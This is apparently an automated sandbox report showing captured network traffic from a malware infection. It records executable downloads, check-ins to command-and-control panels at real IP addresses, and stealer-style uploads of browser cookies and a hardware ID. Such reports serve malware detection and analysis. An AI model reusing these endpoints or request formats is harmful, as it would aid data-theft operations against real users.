                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:57 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 27 Sep 2024 02:16:55 GMTETag: "11d000-6231072fb785a"Accept-Ranges: bytesContent-Length: 1167360Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8f 15 f6 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 20 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 12 00 00 04 00 00 46 a2 12 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 f0 65 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 65 04 00 00 40 0d 00 00 66 04 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 11 00 00 76 00 00 00 5a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:22:02 GMTContent-Type: application/octet-streamContent-Length: 1973760Last-Modified: Fri, 27 Sep 2024 02:17:51 GMTConnection: keep-aliveETag: "66f615cf-1e1e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 60 4e 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 4e 00 00 04 00 00 32 80 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 4e 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 41 4e 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 2c 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6b 67 7a 66 7a 78 75 00 10 1b 00 00 40 33 00 00 04 1b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 76 78 62 68 7a 73 76 00 10 00 00 00 50 4e 00 00 04 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 4e 00 00 22 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                  Source: global trafficHTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: GET /12dsvc.exe HTTP/1.1Host: 194.116.215.195
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000004001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000005001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.17Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                  Source: global trafficHTTP traffic detected: GET /thebig/stories.exe HTTP/1.1Host: 176.113.115.95
                                  Source: global trafficHTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJECAAKKFHCFIECAAAKEHost: 185.215.113.17Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 39 45 32 46 37 32 32 41 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 2d 2d 0d 0a Data Ascii: ------HJECAAKKFHCFIECAAAKEContent-Disposition: form-data; name="hwid"EF9E2F722A951117388365------HJECAAKKFHCFIECAAAKEContent-Disposition: form-data; name="build"default2------HJECAAKKFHCFIECAAAKE--
                                  Source: global trafficHTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117
                                  Source: global trafficHTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 185.215.113.17Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="message"browsers------AFHDAKJKFCFBGCBGDHCB--
                                  Source: global trafficHTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKHost: 185.215.113.17Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="message"plugins------CBKJJEHCBAKFBFHJKFBK--
                                  Source: global trafficHTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHCHost: 185.215.113.17Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 2d 2d 0d 0a Data Ascii: ------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="message"fplugins------BKEBFHIJECFIDGDGCGHC--
                                  Source: global trafficHTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDGHost: 185.215.113.17Content-Length: 6567Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 30 36 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000065001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGHost: 185.215.113.17Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
                                  Source: global trafficHTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHIHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 2d 2d 0d 0a Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="file"------KJKKJKEHDBGIDGDHCFHI--
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000191001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
